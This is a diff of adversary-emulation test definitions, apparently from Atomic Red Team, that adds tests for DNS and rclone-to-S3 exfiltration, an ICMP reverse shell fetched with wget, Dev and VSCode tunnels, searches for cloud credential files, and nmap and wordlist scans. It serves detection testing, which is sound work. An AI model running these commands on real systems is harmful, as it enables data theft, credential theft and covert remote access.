           Import-Module "#{ps_module}"
           Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
         name: powershell
+    - name: Exfiltrate Data using DNS Queries via dig
+      auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
+      description: "This test demonstrates how an attacker can exfiltrate sensitive
+        information by encoding it as a subdomain (using base64 encoding) and \nmaking
+        DNS queries via the dig command to a controlled DNS server.\n"
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        dns_port:
+          type: integer
+          default: '53'
+          description: Attacker's DNS server port
+        attacker_dns_server:
+          type: string
+          default: 8.8.8.8
+          description: Attacker's DNS server address
+        secret_info:
+          type: string
+          default: this is a secret info
+          description: secret info that will be exfiltirated
+      dependency_executor_name: bash
+      dependencies:
+      - description: dig command
+        prereq_command: which dig
+        get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
+          || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
+          install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
+          && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
+          update && brew install --quiet bind
+
+          '
+      executor:
+        command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
+          | base64).google.com
+
+          '
+        name: bash
+        elevation_required: false
   T1052.001:
     technique:
       x_mitre_platforms:
@@ -121371,6 +122709,132 @@ exfiltration:
           Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\T1567.002" -recurse -force
         name: powershell
         elevation_required: false
+    - name: Exfiltrate data with rclone to cloud Storage - AWS S3
+      auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4
+      description: |
+        This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
+        See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        rclone_path:
+          description: Directory of rclone.exe
+          type: path
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/
+        exfil_directory:
+          description: Directory to exfiltrate
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/
+        terraform_path:
+          description: Directory of terraform
+          type: path
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*
+        aws_access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        aws_secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        aws_region:
+          description: AWS Region
+          type: string
+          default: us-east-1
+        aws_profile:
+          description: AWS Profile
+          type: string
+          default: default
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'rclone must exist at (#{rclone_path})
+
+          '
+        prereq_command: 'if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+          $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+          $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+          if ($operatingSystem -match "darwin") {
+            Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+          } elseif ($operatingSystem -match "linux") {
+            Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+          }
+          Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
+      - description: terraform must exist at (#{terraform_path})
+        prereq_command: 'if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+          $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+          $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+          if ($operatingSystem -match "darwin") {
+            Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+          } elseif ($operatingSystem -match "linux") {
+            Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+          }
+          Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
+      - description: 'Must provide a valid directory or file path to exfiltrate to
+          AWS S3
+
+          '
+        prereq_command: 'if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
+          foreach($fileSuffix in 1..10) {
+            Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
+          }
+      executor:
+        command: |
+          Write-Host "Deploying AWS infrastructure... " -NoNewLine
+          $awsAccessKey = "#{aws_access_key}"
+          $awsSecretKey = "#{aws_secret_key}"
+          cd PathToAtomicsFolder/T1567.002/src/
+          if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+            $env:AWS_PROFILE = "#{aws_profile}"
+          } else {
+            $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+            $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+          }
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
+          Write-Host "Done!"
+          Write-Host "Generating rclone config... " -NoNewLine
+          $config = @"
+          [exfils3]
+          type = s3
+          provider = AWS
+          env_auth = true
+          region = #{aws_region}
+          "@
+          $config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
+          Write-Host "Done!"
+          Write-Host "Exfiltrating data... " -NoNewLine
+          $bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
+          cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
+          $null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
+          Write-Host "Done!"
+        cleanup_command: |
+          Write-Host "Destroying AWS infrastructure... " -NoNewLine
+          $awsAccessKey = "#{aws_access_key}"
+          $awsSecretKey = "#{aws_secret_key}"
+          cd PathToAtomicsFolder/T1567.002/src/
+          if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+            $env:AWS_PROFILE = "#{aws_profile}"
+          } else {
+            $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+            $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+          }
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
+          Write-Host "Done!"
+        name: powershell
+        elevation_required: false
   T1030:
     technique:
       x_mitre_platforms:
@@ -121830,11 +123294,11 @@ exfiltration:
         username:
           description: Username for FTP server login
           type: string
-          default: 
+          default:
         password:
           description: Password for FTP server login
           type: string
-          default: 
+          default:
       executor:
         command: |
           $Dir_to_copy = "$env:windir\temp"

atomics/Indexes/linux-index.yaml

@@ -3317,7 +3317,7 @@ defense-evasion:
       executor:
         command: |
           cat /dev/null > /var/log/messages #truncating the file to zero bytes
-          cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)
+          cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
         name: sh
         elevation_required: true
     - name: Overwrite FreeBSD system log via echo utility
@@ -4953,7 +4953,7 @@ defense-evasion:
           text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()),
           key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command,
           key); subprocess.call(exec, shell=True)'''
-        cleanup_command: 
+        cleanup_command:
         name: bash
         elevation_required: false
   T1562:
@@ -6950,7 +6950,7 @@ defense-evasion:
           iptables NOT installed *****\n"; exit 1; fi
 
           '
-        get_prereq_command: 'echo ""
+        get_prereq_command: 'sudo apt-get install iptables
 
           '
       executor:
@@ -30678,7 +30678,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -30730,6 +30730,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -32070,7 +32071,7 @@ execution:
       - linux
       executor:
         command: busybox sh &
-        cleanup_command: 
+        cleanup_command:
         name: sh
         elevation_required: false
     - name: emacs spawning an interactive system shell
@@ -32738,6 +32739,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -32913,6 +32915,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -44933,7 +44936,125 @@ command-and-control:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
       identifier: T1572
-    atomic_tests: []
+    atomic_tests:
+    - name: Microsoft Dev tunnels (Linux/macOS)
+      auto_generated_guid: 9f94a112-1ce2-464d-a63b-83c1f465f801
+      description: |
+        Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels.
+
+        This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc.
+        Reference:
+        - [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
+        - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        port:
+          description: port number for tunnel
+          type: integer
+          default: 8080
+        download_url:
+          description: link to download devtunnel
+          type: string
+          default: https://aka.ms/TunnelsCliDownload/linux-x64
+        binary_path:
+          description: path to download devtunnel
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads/devtunnel
+      dependencies:
+      - description: 'Download devtunnel
+
+          '
+        prereq_command: 'test -f #{binary_path}
+
+          '
+        get_prereq_command: |
+          mkdir -p $(dirname #{binary_path})
+          curl -L "#{download_url}" -o "#{binary_path}"
+          chmod +x #{binary_path}
+      - description: 'Login to Microsoft Dev tunnels
+
+          '
+        prereq_command: '#{binary_path} user show | grep -q "Not logged in" && exit
+          1 || exit 0
+
+          '
+        get_prereq_command: 'echo "Login to devtunnel using the following command:
+          #{binary_path} user login"
+
+          '
+      executor:
+        command: "#{binary_path} host -p #{port} &\n"
+        cleanup_command: |
+          pkill -9 $(basename "#{binary_path}")
+          #{binary_path} user logout
+          rm #{binary_path}
+        name: bash
+    - name: VSCode tunnels (Linux/macOS)
+      auto_generated_guid: b877943f-0377-44f4-8477-f79db7f07c4d
+      description: |
+        Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
+        This atomic will generate a dev tunnel binding it to the local service running on the provided port.
+        Reference:
+        - [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
+        - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        artifact_base_url:
+          description: Base URL to download code-cli
+          type: string
+          default: https://code.visualstudio.com/sha/download
+        artifact_build:
+          description: build to download - Allowed values (stable/insiders)
+          type: string
+          default: stable
+        payload_path:
+          description: path to download code-cli
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads
+        additional_args:
+          description: additional arguments to pass to code tunnel
+          type: string
+          default: ''
+      dependencies:
+      - description: 'Install code-cli
+
+          '
+        prereq_command: 'which code
+
+          '
+        get_prereq_command: "ARCH_SUFFIX=$(uname -m | grep -q \"arm64\\|aarch64\"
+          && echo \"arm64\" || echo \"x64\")\nif [ \"$(uname)\" = \"Darwin\" ]\nthen
+          brew install code-cli\nelif [ \"$(expr substr $(uname) 1 5)\" = \"Linux\"
+          ]\nthen mkdir -p $(dirname #{payload_path})        \n  PKG_TYPE=$(command
+          -v apt >/dev/null && echo \"deb\" || echo \"rpm\")\n  curl -L \"#{artifact_base_url}?build=#{artifact_build}&os=linux-${PKG_TYPE}-${ARCH_SUFFIX}\"
+          -o \"#{payload_path}/code.${PKG_TYPE}\"\n  (which apt && apt install -y
+          \"#{payload_path}/code.${PKG_TYPE}\") || (which yum && yum install -y \"#{payload_path}/code.${PKG_TYPE}\")\n
+          \ rm \"#{payload_path}/code.${PKG_TYPE}\"\nfi\n"
+      - description: 'Login to VSCode Dev tunnels
+
+          '
+        prereq_command: 'code tunnel user show | grep -q "not logged in" && exit 1
+          || exit 0
+
+          '
+        get_prereq_command: 'echo "Login to code tunnel using the following command:
+          code tunnel user login"
+
+          '
+      executor:
+        command: 'nohup code tunnel --accept-server-license-terms #{additional_args}
+          >/dev/null 2>&1 &
+
+          '
+        cleanup_command: |
+          pkill -9 tunnel
+          code tunnel unregister
+          code tunnel user logout
+        name: sh
   T1071.003:
     technique:
       modified: '2024-04-16T12:28:59.928Z'
@@ -46014,7 +46135,34 @@ command-and-control:
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1095
-    atomic_tests: []
+    atomic_tests:
+    - name: Linux ICMP Reverse Shell using icmp-cnc
+      auto_generated_guid: 8e139e1f-1f3a-4be7-901d-afae9738c064
+      description: |
+        ICMP C2 (Command and Control) utilizes the Internet Control Message Protocol (ICMP), traditionally used for network diagnostics, as a covert communication channel for attackers. By using ICMP, adversaries can send commands, exfiltrate data, or maintain access to compromised systems without triggering network detection systems.
+        This method allows attackers to communicate and control compromised devices while remaining undetected.
+
+        For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)
+
+        **Important Notes:**
+        - Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
+        - Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
+        - Root access is required.
+      supported_platforms:
+      - linux
+      executor:
+        steps: "1. Run the following command on both the attacker and victim machines
+          to download the required binaries.\n\n    mkdir -p /tmp/icmpdoor && wget
+          -P /tmp/icmpdoor https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmp-cnc
+          https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmpdoor
+          && chmod +x /tmp/icmpdoor/icmp-cnc /tmp/icmpdoor/icmpdoor && echo 'export
+          PATH=$PATH:/tmp/icmpdoor' >> ~/.bashrc && source ~/.bashrc\n\n2. Start the
+          C2 server on the attacker system to listen for incoming connections.\n\n
+          \   icmp-cnc --interface <Network Interface> --destination_ip <VICTIM-IP>\n\n3.
+          Run the client on the victim machine.\n\n    icmpdoor --interface <Network
+          Interface> --destination_ip <ATTACKER-IP>\n  \n4. Cleanup Command: Remove
+          the icmpdoor directory.\n\n    rm -rf /tmp/icmpdoor\n"
+        name: manual
   T1001.003:
     technique:
       modified: '2024-10-09T15:40:19.436Z'
@@ -49024,9 +49172,9 @@ collection:
       executor:
         name: sh
         elevation_required: false
-        command: "which_python=`which python || which python3`\n$which_python -c \"from
-          zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"
-          \n"
+        command: "which_python=`which python || which python3`\n$which_python -c \"import
+          tarfile; output_file = tarfile.open('#{path_to_output_file}','w'); output_file.add('#{path_to_input_file}');
+          output_file.close()\" \n"
         cleanup_command: 'rm #{path_to_output_file}
 
           '
@@ -50760,50 +50908,7 @@ lateral-movement:
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.004
-    atomic_tests:
-    - name: ESXi - Enable SSH via PowerCLI
-      auto_generated_guid: 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
-      description: 'An adversary enables the SSH service on a ESXi host to maintain
-        persistent access to the host and to carryout subsequent operations.
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        vm_host:
-          description: Specify the host name of the ESXi Server
-          type: string
-          default: atomic.local
-        vm_user:
-          description: Specify the privilege user account on ESXi Server
-          type: string
-          default: root
-        vm_pass:
-          description: Specify the privilege user password on ESXi Server
-          type: string
-          default: pass
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
-
-          '
-        prereq_command: |
-          $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
-          if (-not $RequiredModule) {exit 1}
-        get_prereq_command: 'Install-Module -Name VMware.PowerCLI
-
-          '
-      executor:
-        command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
-          -Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
-          #{vm_pass}\nGet-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key
-          -eq \"TSM-SSH\" } | Start-VMHostService -Confirm:$false\n"
-        cleanup_command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore
-          -ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server #{vm_host}
-          -User #{vm_user} -Password #{vm_pass}\nGet-VMHostService -VMHost #{vm_host}
-          | Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
-        name: powershell
-        elevation_required: true
+    atomic_tests: []
   T1091:
     technique:
       modified: '2023-10-17T20:42:21.453Z'
@@ -56534,7 +56639,7 @@ credential-access:
       identifier: T1552.001
     atomic_tests:
     - name: Find AWS credentials
-      auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
+      auto_generated_guid: 37807632-d3da-442e-8c2e-00f44928ff8f
       description: 'Find local AWS credentials from file, defaults to using / as the
         look path.
 
@@ -56548,7 +56653,7 @@ credential-access:
           type: string
           default: "/"
       executor:
-        command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
+        command: 'find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
 
           '
         name: sh
@@ -56591,6 +56696,65 @@ credential-access:
           echo $file ; cat $file ; done
 
           '
+    - name: Find Azure credentials
+      auto_generated_guid: a8f6148d-478a-4f43-bc62-5efee9f931a4
+      description: 'Find local Azure credentials from file, defaults to using / as
+        the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.azure -name "msal_token_cache.json" -o -name
+          "accessTokens.json" -type f 2>/dev/null
+
+          '
+        name: sh
+    - name: Find GCP credentials
+      auto_generated_guid: aa12eb29-2dbb-414e-8b20-33d34af93543
+      description: 'Find local Google Cloud Platform credentials from file, defaults
+        to using / as the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.config/gcloud -name "credentials.db" -o -name
+          "access_tokens.db" -type f 2>/dev/null
+
+          '
+        name: sh
+    - name: Find OCI credentials
+      auto_generated_guid: 9d9c22c9-fa97-4008-a204-478cf68c40af
+      description: 'Find local Oracle cloud credentials from file, defaults to using
+        / as the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
+
+          '
+        name: sh
   T1606.001:
     technique:
       modified: '2023-09-19T21:25:10.511Z'
@@ -59285,7 +59449,7 @@ discovery:
       executor:
         name: bash
         elevation_required: false
-        command: 'ping -n 4 #{ping_target}
+        command: 'ping -c 4 #{ping_target}
 
           '
   T1069:
@@ -63438,6 +63602,41 @@ discovery:
           nc -nv #{host} #{port}
         name: sh
         elevation_required: true
+    - name: Port Scan using nmap (Port range)
+      auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
+      description: 'Scan multiple ports to check for listening ports with nmap
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        host:
+          description: Host(s) to scan.
+          type: string
+          default: 127.0.0.1
+        port_range:
+          description: Port range(s) to scan.
+          type: string
+          default: 0-65535
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check if nmap command exists on the machine
+
+          '
+        prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
+          fi;
+
+          '
+        get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which
+          pkg && pkg install -y nmap)||(which brew && brew install nmap)\n"
+      executor:
+        command: 'nmap -Pn -sV -p #{port_range} #{host}
+
+          '
+        elevation_required: true
+        name: sh
   T1518:
     technique:
       modified: '2024-04-16T00:16:06.689Z'
@@ -68515,7 +68714,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -68533,7 +68732,41 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1595.003
+    atomic_tests:
+    - name: Web Server Wordlist Scan
+      auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
+      description: 'This test will scan a target system with a wordlist of common
+        directories and file paths.
+
+        '
+      supported_platforms:
+      - windows
+      - linux
+      - macos
+      input_arguments:
+        target:
+          description: The target system to scan
+          type: string
+          default: http://localhost
+        wordlist:
+          description: The wordlist to use for scanning
+          type: path
+          default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
+        request_timeout:
+          description: The timeout for each request (in seconds)
+          type: integer
+          default: 5
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:TMPDIR/wordlist_scan.txt"
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
+          Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
+          Write-Host "Scan complete. Results saved to: #{output_file}"
+        name: powershell
   T1591.004:
     technique:
       x_mitre_platforms:
@@ -74165,6 +74398,45 @@ exfiltration:
 
           '
         name: sh
+    - name: Exfiltrate Data using DNS Queries via dig
+      auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
+      description: "This test demonstrates how an attacker can exfiltrate sensitive
+        information by encoding it as a subdomain (using base64 encoding) and \nmaking
+        DNS queries via the dig command to a controlled DNS server.\n"
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        dns_port:
+          type: integer
+          default: '53'
+          description: Attacker's DNS server port
+        attacker_dns_server:
+          type: string
+          default: 8.8.8.8
+          description: Attacker's DNS server address
+        secret_info:
+          type: string
+          default: this is a secret info
+          description: secret info that will be exfiltirated
+      dependency_executor_name: bash
+      dependencies:
+      - description: dig command
+        prereq_command: which dig
+        get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
+          || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
+          install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
+          && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
+          update && brew install --quiet bind
+
+          '
+      executor:
+        command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
+          | base64).google.com
+
+          '
+        name: bash
+        elevation_required: false
   T1052.001:
     technique:
       x_mitre_platforms:
@@ -74307,7 +74579,133 @@ exfiltration:
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1567.002
-    atomic_tests: []
+    atomic_tests:
+    - name: Exfiltrate data with rclone to cloud Storage - AWS S3
+      auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4
+      description: |
+        This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
+        See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        rclone_path:
+          description: Directory of rclone.exe
+          type: path
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/
+        exfil_directory:
+          description: Directory to exfiltrate
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/
+        terraform_path:
+          description: Directory of terraform
+          type: path
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*
+        aws_access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        aws_secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        aws_region:
+          description: AWS Region
+          type: string
+          default: us-east-1
+        aws_profile:
+          description: AWS Profile
+          type: string
+          default: default
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'rclone must exist at (#{rclone_path})
+
+          '
+        prereq_command: 'if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+          $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+          $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+          if ($operatingSystem -match "darwin") {
+            Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+          } elseif ($operatingSystem -match "linux") {
+            Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+          }
+          Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
+      - description: terraform must exist at (#{terraform_path})
+        prereq_command: 'if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+          $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+          $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+          if ($operatingSystem -match "darwin") {
+            Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+          } elseif ($operatingSystem -match "linux") {
+            Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+          }
+          Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
+      - description: 'Must provide a valid directory or file path to exfiltrate to
+          AWS S3
+
+          '
+        prereq_command: 'if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
+          foreach($fileSuffix in 1..10) {
+            Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
+          }
+      executor:
+        command: |
+          Write-Host "Deploying AWS infrastructure... " -NoNewLine
+          $awsAccessKey = "#{aws_access_key}"
+          $awsSecretKey = "#{aws_secret_key}"
+          cd PathToAtomicsFolder/T1567.002/src/
